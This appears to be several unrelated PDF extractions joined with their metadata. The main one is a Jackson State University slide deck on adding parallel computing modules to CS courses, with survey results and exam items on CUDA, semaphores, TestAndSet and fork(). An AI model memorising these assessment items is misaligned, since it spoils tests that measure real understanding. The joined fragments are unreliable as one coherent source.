} Sym;

func_attr_t *func_call = FUNC_CALL(sym->r);
```

```c
typedef int parse_opt_cb(const struct option *, const char *arg, int unset);

static int stdin_cacheinfo_callback(struct parse_opt_ctx_t *ctx,
        const struct option *opt, int unset) { /* ... */ }

struct option options[] = {
    /* ... */,
    {OPTION_LOWLEVEL_CALLBACK, 0, /* ...*/, (parse_opt_cb *) stdin_cacheinfo_callback },
    /* ... */
};
```

```c
if (value->kind > RTX_DOUBLE && value->un.addr.base != 0)
    switch (GET_CODE (value->un.addr.base))
    {
    case SYMBOL_REF:
        /* Use the string's address, not the SYMBOL_REF's address, */
        /* for the sake of addresses of library routines. */
        value->un.addr.base = (rtx) XSTR (value->un.addr.base, 0);
        break;
    /* ... */
    }
```

```c
item->util = xcalloc(sizeof(struct branch_info), 1);

if (((* array4D) = (short****)calloc(idx, sizeof(short**))) == NULL)
    no_mem_exit("get_mem4Dshort::array4D");
```

Code is here:
- https://github.com/stephenrkell/libcrunch
and also
- https://github.com/stephenrkell/libdwarfpp
- https://github.com/stephenrkell/dwarfidl
- https://github.com/stephenrkell/liballocs
- https://github.com/stephenrkell/libsrk31c++
- ... will make a friendly download-and-build script soon

Questions?
{"Source-Url": "https://www.cl.cam.ac.uk/~srk31/research/talks/kell14run-time-slides.pdf", "len_cl100k_base": 5377, "olmocr-version": "0.1.50", "pdf-total-pages": 55, "total-fallback-pages": 0, "total-input-tokens": 77603, "total-output-tokens": 7408, "length": "2e12", "weborganizer": {"__label__adult": 0.0003674030303955078, "__label__art_design": 0.0003211498260498047, "__label__crime_law": 0.00027942657470703125, "__label__education_jobs": 0.0003063678741455078, "__label__entertainment": 5.167722702026367e-05, "__label__fashion_beauty": 0.00013113021850585938, "__label__finance_business": 0.00012153387069702148, "__label__food_dining": 0.0003819465637207031, "__label__games": 0.0003795623779296875, "__label__hardware": 0.0009169578552246094, "__label__health": 0.0003726482391357422, "__label__history": 0.0001552104949951172, "__label__home_hobbies": 9.02414321899414e-05, "__label__industrial": 0.0002846717834472656, "__label__literature": 0.0001811981201171875, "__label__politics": 0.00024044513702392575, "__label__religion": 0.0004658699035644531, "__label__science_tech": 0.003841400146484375, "__label__social_life": 8.893013000488281e-05, "__label__software": 0.0033245086669921875, "__label__software_dev": 0.98681640625, "__label__sports_fitness": 0.0003070831298828125, "__label__transportation": 0.00036978721618652344, "__label__travel": 0.00019502639770507812}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 19082, 0.01462]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 19082, 0.14376]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 19082, 0.6354]], "google_gemma-3-12b-it_contains_pii": [[0, 145, false], [145, 265, null], [265, 409, null], [409, 711, null], [711, 1101, null], [1101, 1448, null], [1448, 1716, null], [1716, 1967, null], [1967, 2034, null], [2034, 2134, null], [2134, 2301, null], [2301, 2595, null], [2595, 2727, null], [2727, 2920, null], [2920, 3260, null], [3260, 3640, null], [3640, 3953, null], [3953, 4420, null], [4420, 4796, null], [4796, 5234, null], [5234, 5421, null], [5421, 5672, null], [5672, 5902, null], [5902, 6052, null], [6052, 6473, null], [6473, 7035, null], [7035, 10338, null], [10338, 10694, null], [10694, 10949, null], [10949, 11281, null], [11281, 11586, null], [11586, 11737, null], [11737, 12011, null], [12011, 12090, null], [12090, 12196, null], [12196, 12551, null], [12551, 12906, null], [12906, 13407, null], [13407, 13841, null], [13841, 14151, null], [14151, 14347, null], [14347, 14548, null], [14548, 14746, null], [14746, 15085, null], [15085, 15945, null], [15945, 16308, null], [16308, 16591, null], [16591, 17068, null], [17068, 17465, null], [17465, 17904, null], [17904, 18238, null], [18238, 18595, null], [18595, 18650, null], [18650, 18764, null], [18764, 19082, null]], "google_gemma-3-12b-it_is_public_document": [[0, 145, true], [145, 265, null], [265, 409, null], [409, 711, null], [711, 1101, null], [1101, 1448, null], [1448, 1716, null], [1716, 1967, null], [1967, 2034, null], [2034, 2134, null], [2134, 2301, null], [2301, 2595, null], [2595, 2727, null], [2727, 2920, null], [2920, 3260, null], [3260, 3640, null], [3640, 3953, null], [3953, 4420, null], [4420, 4796, null], [4796, 5234, null], [5234, 5421, null], [5421, 5672, null], [5672, 5902, null], [5902, 6052, null], [6052, 6473, null], [6473, 7035, null], [7035, 10338, null], [10338, 10694, null], [10694, 10949, null], [10949, 11281, null], [11281, 
11586, null], [11586, 11737, null], [11737, 12011, null], [12011, 12090, null], [12090, 12196, null], [12196, 12551, null], [12551, 12906, null], [12906, 13407, null], [13407, 13841, null], [13841, 14151, null], [14151, 14347, null], [14347, 14548, null], [14548, 14746, null], [14746, 15085, null], [15085, 15945, null], [15945, 16308, null], [16308, 16591, null], [16591, 17068, null], [17068, 17465, null], [17465, 17904, null], [17904, 18238, null], [18238, 18595, null], [18595, 18650, null], [18650, 18764, null], [18764, 19082, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 19082, null]], "pdf_page_numbers": [[0, 145, 1], [145, 265, 2], [265, 409, 3], [409, 711, 4], [711, 1101, 5], [1101, 1448, 6], [1448, 1716, 7], [1716, 1967, 8], [1967, 2034, 9], [2034, 2134, 10], [2134, 2301, 11], [2301, 2595, 12], [2595, 2727, 13], [2727, 2920, 14], [2920, 3260, 15], [3260, 3640, 16], [3640, 3953, 17], [3953, 4420, 18], [4420, 4796, 19], [4796, 5234, 20], [5234, 5421, 21], [5421, 5672, 22], [5672, 5902, 23], [5902, 6052, 24], [6052, 6473, 25], [6473, 7035, 26], [7035, 10338, 27], [10338, 10694, 28], [10694, 10949, 29], [10949, 11281, 30], [11281, 11586, 31], [11586, 11737, 32], [11737, 12011, 33], [12011, 12090, 34], [12090, 12196, 35], [12196, 12551, 36], [12551, 12906, 37], [12906, 13407, 38], [13407, 13841, 39], [13841, 14151, 40], [14151, 14347, 41], [14347, 14548, 42], [14548, 14746, 43], [14746, 15085, 44], [15085, 15945, 45], [15945, 16308, 46], [16308, 16591, 47], [16591, 17068, 48], [17068, 17465, 49], [17465, 17904, 50], [17904, 18238, 51], [18238, 18595, 52], [18595, 18650, 53], [18650, 18764, 54], [18764, 19082, 55]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 19082, 0.08348]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
61cccbb9949964188cb53cd46f160fe8d28b87fe
Incorporating PDC Modules into Computer Science Courses at Jackson State University Ali Abu El Humos, Sungbum Hong, Jacqueline Jackson, Xuejun Liang, Tzusheng Pei and Bernard Aldrich Department of Computer Science Jackson State University Jackson, MS 39217, USA Agenda • Background • Curriculum Changes • Early Adopting Courses • Students Feedback • PDC Modules Inclusion • Assessment Tools and Results • Conclusions and Future Work Background • Jackson State University (JSU) has a student population that is over 90% from under-represented groups • About 25% of our students are females • This NSF/IEEE-TCPP Curriculum Initiative award will therefore have a direct impact on minorities specifically in the Computer Science field Curriculum Changes • The computer science department at Jackson State University is updating its curriculum according to the new ABET guidelines. • The computer science new curriculum at JSU is a 125 credit-hour program of which 57 in computer science. • Some advanced computer architecture topics are moved to elective courses. This may prevent students from learning about important PDC topics such as pipelining, superscalar architectures, Multiprocessors and Multi-core processors, and GPU programming. Early Adopting Courses 1) CSC 119 Object Oriented Programming (core) 2) CSC 216 Computer Architecture and Organization (core) 3) CSC 312 Advanced Computer Architecture (core) 4) CSC 325 Operating Systems (core) 5) CSC 350 Organization of Programming Languages (core) 6) CSC 425 Parallel Computing (elective) CSC 119 Object Oriented Programming in Java - Covers inheritance, polymorphism, interfaces, exception handling, streams and file input/output, recursion, dynamic data structures (linked lists, stacks, queues, hash tables, graphs, trees) and associated algorithms - For supporting parallel computing, Java has the Thread class and the Runnable interface, and it also provides rich primitives with the java.util.concurrent packages, which include the fork/join framework. Students explored these features in Java for parallel computing. CSC 216 Computer Architecture and Organization • Covers the basic concepts of computer architecture which includes: – machine level representations of data – computer arithmetic – instruction set architecture and assembly language, – datapath and control – memory system – and bus architectures and I/O devices • A new PDC module was added to this course to introduce students to multi core processors and GPU hardware. Also, throughout the course, parallelism at different levels were discussed. CSC 312 Advanced Computer Architecture • This course may become an elective under the new curriculum. • Covers various advanced topics of PDC curriculum such as: – instruction level parallelism: pipelining and superscalar architectures – processor level parallelism: array processors, multi-processor and multi-computer systems. – Techniques to reduce instruction pipeline stalls, – Direct map and set associative caches are analyzed – Quantitative approaches of computer performance are emphasized. • A new PDC module was added to this course to introduce students to bench marks and how they can be used to differentiate between various parallel systems performance. CSC 325 Operating Systems • This course introduces the major concepts of process communication and synchronization, protection, performance measurement, and causes and evaluations of the problems associated with mutual exclusions and process synchronization among concurrent processes. 
It also introduces and analyzes various operating systems in terms of processor management, memory management, device management, information management, and distributed systems management.
• A PDC module was added to this course to extend process synchronization issues to parallel programming concepts. With this module, the course will provide students with parallel thread programming opportunities.

CSC 350 Organization of Programming Languages
• Covers several issues in language design, including typing regimens, data structure models, control structure models, abstraction, virtual machines, language translation, interpreters, compiler design, lexical analysis, parsing, symbol tables, declaration and storage management, code generation, and optimization techniques.
• In this course, after a brief review of the Java features for supporting parallel computing (taught in CSC 119), parallel programming assignments were given for gaining hands-on experience. Generic concepts in parallel computing were also introduced.

CSC 425 Parallel Computing
• This is a newly developed elective.
• Only one student registered for the Parallel Computing class offered last fall semester, which resulted in cancelling the class.
• A study of hardware and software issues in parallel computing. Theoretical and practical survey of parallel processing, including a discussion of parallel architectures, parallel programming languages, and parallel algorithms. Programming on multiple parallel platforms in a higher-level parallel language.
• In this course, students will learn how to write parallel programs on three different parallel architectures: i) shared memory model (thread programming); ii) cluster (message-passing computing); and iii) multicore (GPU programming).

A survey of six questions was distributed among ACM computer science students. Results are reported as follows, with Min = 1 and Max = 4:

<table>
<thead>
<tr> <th>Question</th> <th>Average Score</th> </tr>
</thead>
<tbody>
<tr> <td>Please, rate your current knowledge of PDC.</td> <td>1.4</td> </tr>
<tr> <td>Please, rate the breadth of PDC topics covered in the computer science curriculum at JSU.</td> <td>1.4</td> </tr>
<tr> <td>Please, rate the depth of PDC topics covered in the computer science curriculum at JSU.</td> <td>1.5</td> </tr>
<tr> <td>Please, rate your overall learning experience of PDC at the computer science department at JSU.</td> <td>1.5</td> </tr>
<tr> <td>Will you be interested in pursuing a career that requires PDC knowledge?</td> <td>2.5</td> </tr>
<tr> <td>Will you be interested in registering for Advanced PDC classes if offered during fall or spring semesters?</td> <td>3.0</td> </tr>
</tbody>
</table>

Students Comments
• “I do not have knowledge of PDC. It would be helpful if we learned about this topic in our classes. This could help with strengthening our programming skills. Activities or projects during class would be helpful”.
• “I hope that there would be mentoring sessions with faculty to help students address the issue of being able to learn on our own different languages and principles of Computer Science”.
• “One could provide real world Applications of PDC. If it is implemented in classes, make sure that you provide real world application as well as theory. The combination of both solidifies its importance and builds interest”.
• “I think it is very relevant, but at the same time, I do not know anything about it. I just know that our curriculum is already filled with classes, and it is tough trying to manage those classes”.
• “The topic should be touched in classes at every level. For a topic like this, the students should start learning about it as freshmen so that they can increase understanding of it over time”.
• “PDC careers should be discussed more and more. More hands on activities”.
• “We really did not talk about PDC in my undergraduate program. I would love to see it offered for students”.

PDC Modules Inclusion
1) CSC 119 Object Oriented Programming: PDC topics like Java threads were emphasized in class. Problems were developed for students to work on outside the classroom.
2) CSC 216 Computer Architecture and Organization: This course was taught twice a week. Since the class size was small (only 6 students), the instructor agreed with the students to add 5 minutes to each lecture. That provided the instructor with about 3 extra hours to cover PDC topics like multi-core processors and GPU hardware.
3) CSC 312 Advanced Computer Architecture: The time to cover pipeline hazards was reduced to accommodate the inclusion of benchmarks (around 1.5 hours). Students were asked to submit 2 research papers:
– A comprehensive survey of various benchmarks used to report performance of Desktop, Server and Embedded Systems.
– Multi-core processor issues such as caching, pipelining, energy consumption, Operating Systems, and performance.
4) CSC 325 Operating Systems: In order to create space to cover the PDC topics of multi-core programming and the multi-threading model, the following actions were taken:
– Skip some subtopics not dependent on the important topics that ACM/IEEE 2013 suggested. Students can understand these subtopics by just reading them.
– Problem sets were developed for students to study in groups outside the classroom.

PDC Modules Inclusion (continued)
5) CSC 350 Organization of Programming Languages: The time to cover the course topics is already limited. Students were given an extra-curricular parallel programming assignment.

Assessment Tools: CSC 119 Object Oriented Programming
• Final Exam Questions Set:
– How do you specify concurrent activities in Java?
– What activities benefit from concurrent programming?
– Describe the life cycle of a thread.
– Write a program that demonstrates the use of a thread.
• Programming Assignment:
– Write a program that uses multiple threads to print at random intervals.

Bonus Test on GPU Architecture and Computing:
- What is a heterogeneous system? Please provide an example.
- How have GPUs evolved from special graphics processors to programmable general-purpose parallel processors?
- What is GPU computing?
- What is the Basic Unified GPU Architecture?
- What is CUDA?
- What are the three CUDA paradigms?
- Please draw a block diagram to show the structure of a contemporary PC with an Intel CPU.

• Programming Assignments:
1. The following code is computing $y = ax + y$ with a serial loop, where $x$ and $y$ are arrays of length $n$ and $a$ is a scalar constant.

```c
void saxpy_serial (int n, float alpha, float *x, float *y)
{
    for (int i=0; i<n; i++)
        y[i] = alpha*x[i] + y[i];
}
```

The code in the next line will invoke the serial function saxpy_serial:

```c
saxpy_serial(n, 2.0, x, y);
```

Please write a CUDA kernel function to compute the same $y = ax + y$ in parallel. Please also show how to invoke the CUDA kernel.
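For reference, a typical solution to assignment 1 follows the standard SAXPY pattern shown below. This is a sketch rather than an official answer key: the kernel name, the 256-thread block size, and the assumption that `x` and `y` already point to device memory are illustrative choices, not part of the original assignment.

```c
// CUDA kernel: one thread computes one element of y = alpha*x + y.
__global__ void saxpy_parallel(int n, float alpha, float *x, float *y)
{
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < n)                  // guard: n need not be a multiple of the block size
        y[i] = alpha * x[i] + y[i];
}

// Host-side invocation, assuming x and y are device pointers:
// launch one thread per element, 256 threads per block.
int nblocks = (n + 255) / 256;
saxpy_parallel<<<nblocks, 256>>>(n, 2.0f, x, y);
```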
2. The following CUDA kernel function utilizes three different levels of memory (global, shared and local). Please fill in the following blanks with a digit from 1 to 4 to indicate which is faster (1: fastest, 4: slowest).

```c
__global__ void foo(float *x, float *y, float *z)
{
    __shared__ float a, b, c;   // a, b, c are shared memory
    float s, t, u;              // s, t, u are local memory
    s = *x;      // ________
    t = s;       // ________
    a = b;       // ________
    *y = *z;     // ________
}
```

Assessment Tools: CSC 312 Advanced Computer Architecture
- **Exam1 Q1** Define the following terms briefly:
  - Flynn's Taxonomy:
  - Processor Level Parallelism:
  - Instruction Pipelining:
- **Exam3 Q1** An MIMD machine has m processors and m memory modules interconnected by means of a single shared bus. Suppose that a processor tries to use the bus in a given cycle with probability p. What is the probability that:
  - The bus is idle (zero requests)?
  - Exactly one request is made?
  - More than one request is made?
- **Exam3 Q2** What are the advantages and disadvantages of using a single shared bus as an interconnection network in a multiprocessor system?
- **Project1**: Provide a comprehensive survey of various benchmarks used to report performance of Desktop, Server and Embedded Systems. Show some comparative results.
- **Project2**: Research the topic of Dual and Multi Core Processors; provide information about caching, pipelining, energy consumption and performance.

Assessment Tools: CSC 325 Operating Systems
• **Exam 2-2.** Can a multithreaded solution using multiple user-level threads achieve better performance on a multiprocessor system than on a single-processor system?
• **Exam 2-4.** Write the structure of a process synchronization solution with "TestAndSet."

```c
boolean TestAndSet (boolean *target)
{
    boolean rv = *target;
    *target = TRUE;
    return rv;
}
```

Shared boolean variable lock, initialized to false.

Assessment Tools: CSC 325 Operating Systems (continued)
**Final 3.** Fill in the following blanks to solve the Producer-Consumer Problem under the following conditions: (i) the producer process produces information that is consumed by a consumer process; (ii) the bounded buffer assumes that there is a fixed buffer size.
Shared data: semaphore full, empty, mutex; initially: full = 0, empty = n, mutex = 1.

Producer Process_i:
```
do {
    ... produce an item in nextp ...
    ________( );
    wait(mutex);
    ... add nextp to buffer ...
    signal(mutex);
    ________( );
} while (1);
```

Consumer Process_j:
```
do {
    wait(full);
    ________( );
    ... remove an item from buffer to nextc ...
    ________( );
    signal(empty);
    ... consume the item in nextc ...
} while (1);
```

Assessment Tools: CSC 325 Operating Systems (continued)
• **Exam 1-2** Write three primary thread libraries.
• **Exam 1-III-1.** Including the initial parent process, how many processes are created by the program shown below? To verify your answer, you need to draw a graph to show the spawning process.

```c
#include <stdio.h>
#include <unistd.h>

int main ()
{
    /* for a child process */
    fork();
    /* for a child process */
    fork();
    /* for a child process */
    fork();
    /* for a child process */
    fork();
    /* and fork another */
    fork();
    return 0;
}
```

**Exam 1-III-2.** Using the program below, identify the value of pid at lines A, B, C, and D.
(Assume that the actual pids of the parent and child are 2400 and 2700, respectively) ```c #include <sys/types.h> #include <stdio.h> #include <unistd.h> int main (){ pid_t pid, pid1; pid=fork(); if(pid< 0){ /* error occurred */ fprintf(stderr, "Fork Failed"); return 1; } else if (pid == 0) { /* child process */ pid1 = getpid(); printf("child: pid = %d", pid); /* line A, pid= */ printf("child: pid1 = %d", pid1); /*line B, pid1= */ } else { /* Parent process */ pid1 = getpid(); printf("Parent: pid = %d", pid); /* line C, pid = */ printf("Parent: pid1 = %d", pid1); /*line D, pid1= */ } return 0; } ``` Assessment Tools: CSC 350 Organization of Programming Languages Read the following tutorial for concurrency and answer the following questions: http://docs.oracle.com/javase/tutorial/essential/concurrency/runthread.html 1. There are two ways to implement threads. Describe them. Also describe what the following 2 program segments do. ```java public class HelloRunnable implements Runnable { public void run() { System.out.println("Hello from a thread!"); } public static void main(String args[]) { (new Thread(new HelloRunnable())).start(); } } ``` ```java public class HelloThread extends Thread { public void run() { System.out.println("Hello from a thread!"); } public static void main(String args[]) { (new HelloThread()).start(); } } ``` 2. Describe what the following program segment does: ```java public class SleepMessages { public static void main(String args[]) throws InterruptedException { String importantInfo[] = { "Mares eat oats", "Does eat oats", "Little lambs eat ivy", "A kid will eat ivy too" }; for (int i = 0; i < importantInfo.length; i++) { // Pause for 4 seconds Thread.sleep(4000); // Print a message System.out.println(importantInfo[i]); } } } ``` # Assessment Topics <table> <thead> <tr> <th>Course Name</th> <th>PDC Topics</th> </tr> </thead> <tbody> <tr> <td>CSC 119 Object Oriented Programming</td> <td>Concurrent activities in Java, Java thread.</td> </tr> <tr> <td>CSC 312 Advanced Computer Architecture</td> <td>Flynn’s Taxonomy, Instruction Level and Processor Level Parallelism, Benchmarks.</td> </tr> <tr> <td>CSC 350 Organization of Programming Languages</td> <td>Understanding fundamental concepts in threads, Reading programs with threads.</td> </tr> </tbody> </table> ## Assessment Results <table> <thead> <tr> <th>Course Name</th> <th>[EX, EF, M, U] Vector</th> <th>Weighted Average</th> </tr> </thead> <tbody> <tr> <td>CSC 119 Object Oriented Programming</td> <td>[3, 0, 0, 1]</td> <td>2.87</td> </tr> <tr> <td>CSC 216 Computer Architecture and Organization</td> <td>[3, 0, 1, 1]</td> <td>3.00</td> </tr> <tr> <td>CSC 312 Advanced Computer Architecture</td> <td>[2, 4, 3, 1]</td> <td>2.70</td> </tr> <tr> <td>CSC 325 Operating Systems</td> <td>[8, 5, 1, 24]</td> <td>1.92</td> </tr> <tr> <td>CSC 350 Organization of Programming Languages</td> <td>[2, 1, 1, 0]</td> <td>3.25</td> </tr> </tbody> </table> Conclusions and Future Work • PDC modules were implemented in the aforementioned courses. • A presentation about PDC education for ACM computer science students was organized early in the fall semester. Students shared their views on how to integrate PDC into the computer science curriculum and had constructive feedback from students and faculty. • Two graduate students were motivated about PDC education and attended the EduHPC 14 workshop, where we presented some of our early experience of PDC education at JSU [3]. • Assessment data was collected at the end of the fall semester. 
The data showed that students were comfortably able to learn PDC concepts and were motivated by these topics to pursue a career or do research in the area of PDC.
• To support our students with adequate PDC resources, a Tesla K40C GPU granted by NVIDIA Inc. [4] has been added to the Distributed Computing Laboratory. The system provides 2880 CUDA cores and 12 GB of memory on the Tesla K40, a 400 GB HDD, and another 192 CUDA cores on a Quadro 2000 GPU card. Combined, they provide adequate power to support simulations requiring high-power computing capacity.
• The MATLAB [5] Parallel Computing Toolbox will soon be available for our students. Internal university funding is also being sought to continue this project in the coming semesters.
• Course Continuous Improvement is a requirement that ABET accreditation teams always look for. Our Department FCARs (Faculty Course Assessment Reports) will include PDC modules to satisfy this requirement.

References
{"Source-Url": "http://grid.cs.gsu.edu/~tcpp/curriculum/sites/default/files/EduHP-15.pdf", "len_cl100k_base": 4258, "olmocr-version": "0.1.53", "pdf-total-pages": 30, "total-fallback-pages": 0, "total-input-tokens": 44386, "total-output-tokens": 5693, "length": "2e12", "weborganizer": {"__label__adult": 0.000942707061767578, "__label__art_design": 0.0015230178833007812, "__label__crime_law": 0.001087188720703125, "__label__education_jobs": 0.347900390625, "__label__entertainment": 0.00026297569274902344, "__label__fashion_beauty": 0.000728607177734375, "__label__finance_business": 0.0009927749633789062, "__label__food_dining": 0.001247406005859375, "__label__games": 0.0021495819091796875, "__label__hardware": 0.005146026611328125, "__label__health": 0.00246429443359375, "__label__history": 0.0013103485107421875, "__label__home_hobbies": 0.0006871223449707031, "__label__industrial": 0.002292633056640625, "__label__literature": 0.0009207725524902344, "__label__politics": 0.0010728836059570312, "__label__religion": 0.001800537109375, "__label__science_tech": 0.1798095703125, "__label__social_life": 0.0005970001220703125, "__label__software": 0.00881195068359375, "__label__software_dev": 0.43310546875, "__label__sports_fitness": 0.0017175674438476562, "__label__transportation": 0.0026874542236328125, "__label__travel": 0.0006737709045410156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20135, 0.01506]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20135, 0.81455]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20135, 0.88156]], "google_gemma-3-12b-it_contains_pii": [[0, 263, false], [263, 435, null], [435, 734, null], [734, 1244, null], [1244, 1553, null], [1553, 2089, null], [2089, 2600, null], [2600, 3282, null], [3282, 3975, null], [3975, 4597, null], [4597, 5335, null], [5335, 6297, null], [6297, 7530, null], [7530, 8047, null], [8047, 8888, null], [8888, 9098, null], [9098, 9496, null], [9496, 9920, null], [9920, 11013, null], [11013, 12016, null], [12016, 12440, null], [12440, 13511, null], [13511, 14060, null], [14060, 14842, null], [14842, 15656, null], [15656, 16258, null], [16258, 17200, null], [17200, 17893, null], [17893, 19441, null], [19441, 20135, null]], "google_gemma-3-12b-it_is_public_document": [[0, 263, true], [263, 435, null], [435, 734, null], [734, 1244, null], [1244, 1553, null], [1553, 2089, null], [2089, 2600, null], [2600, 3282, null], [3282, 3975, null], [3975, 4597, null], [4597, 5335, null], [5335, 6297, null], [6297, 7530, null], [7530, 8047, null], [8047, 8888, null], [8888, 9098, null], [9098, 9496, null], [9496, 9920, null], [9920, 11013, null], [11013, 12016, null], [12016, 12440, null], [12440, 13511, null], [13511, 14060, null], [14060, 14842, null], [14842, 15656, null], [15656, 16258, null], [16258, 17200, null], [17200, 17893, null], [17893, 19441, null], [19441, 20135, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20135, null]], 
"google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20135, null]], "pdf_page_numbers": [[0, 263, 1], [263, 435, 2], [435, 734, 3], [734, 1244, 4], [1244, 1553, 5], [1553, 2089, 6], [2089, 2600, 7], [2600, 3282, 8], [3282, 3975, 9], [3975, 4597, 10], [4597, 5335, 11], [5335, 6297, 12], [6297, 7530, 13], [7530, 8047, 14], [8047, 8888, 15], [8888, 9098, 16], [9098, 9496, 17], [9496, 9920, 18], [9920, 11013, 19], [11013, 12016, 20], [12016, 12440, 21], [12440, 13511, 22], [13511, 14060, 23], [14060, 14842, 24], [14842, 15656, 25], [15656, 16258, 26], [16258, 17200, 27], [17200, 17893, 28], [17893, 19441, 29], [19441, 20135, 30]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20135, 0.0719]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
29ad6822000b60741d98c087c91b8a9252cc1631
[REMOVED]
{"Source-Url": "https://iris.polito.it/retrieve/handle/11583/2624679/98369/2015_ESOCC_Verification.pdf", "len_cl100k_base": 5241, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 32171, "total-output-tokens": 6400, "length": "2e12", "weborganizer": {"__label__adult": 0.0004584789276123047, "__label__art_design": 0.0003333091735839844, "__label__crime_law": 0.0005087852478027344, "__label__education_jobs": 0.0007052421569824219, "__label__entertainment": 0.00014734268188476562, "__label__fashion_beauty": 0.0002218484878540039, "__label__finance_business": 0.0007882118225097656, "__label__food_dining": 0.00039076805114746094, "__label__games": 0.0006074905395507812, "__label__hardware": 0.0033016204833984375, "__label__health": 0.0010938644409179688, "__label__history": 0.00043845176696777344, "__label__home_hobbies": 0.0001310110092163086, "__label__industrial": 0.0009140968322753906, "__label__literature": 0.0003559589385986328, "__label__politics": 0.0004074573516845703, "__label__religion": 0.0004849433898925781, "__label__science_tech": 0.39990234375, "__label__social_life": 0.00014019012451171875, "__label__software": 0.020782470703125, "__label__software_dev": 0.56591796875, "__label__sports_fitness": 0.0003843307495117187, "__label__transportation": 0.0011377334594726562, "__label__travel": 0.0002734661102294922}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 27760, 0.03981]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 27760, 0.33381]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 27760, 0.91651]], "google_gemma-3-12b-it_contains_pii": [[0, 835, false], [835, 1623, null], [1623, 4045, null], [4045, 7584, null], [7584, 10836, null], [10836, 13153, null], [13153, 16583, null], [16583, 18486, null], [18486, 20371, null], [20371, 22816, null], [22816, 25038, null], [25038, 27760, null]], "google_gemma-3-12b-it_is_public_document": [[0, 835, true], [835, 1623, null], [1623, 4045, null], [4045, 7584, null], [7584, 10836, null], [10836, 13153, null], [13153, 16583, null], [16583, 18486, null], [18486, 20371, null], [20371, 22816, null], [22816, 25038, null], [25038, 27760, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 27760, null]], "pdf_page_numbers": [[0, 835, 1], [835, 1623, 2], [1623, 4045, 3], [4045, 7584, 4], [7584, 10836, 5], [10836, 13153, 6], [13153, 16583, 7], [16583, 18486, 8], [18486, 20371, 9], [20371, 22816, 10], [22816, 25038, 11], [25038, 27760, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 27760, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
b4e4e28448c155c1044b36f7126cfb4b8aa75f3b
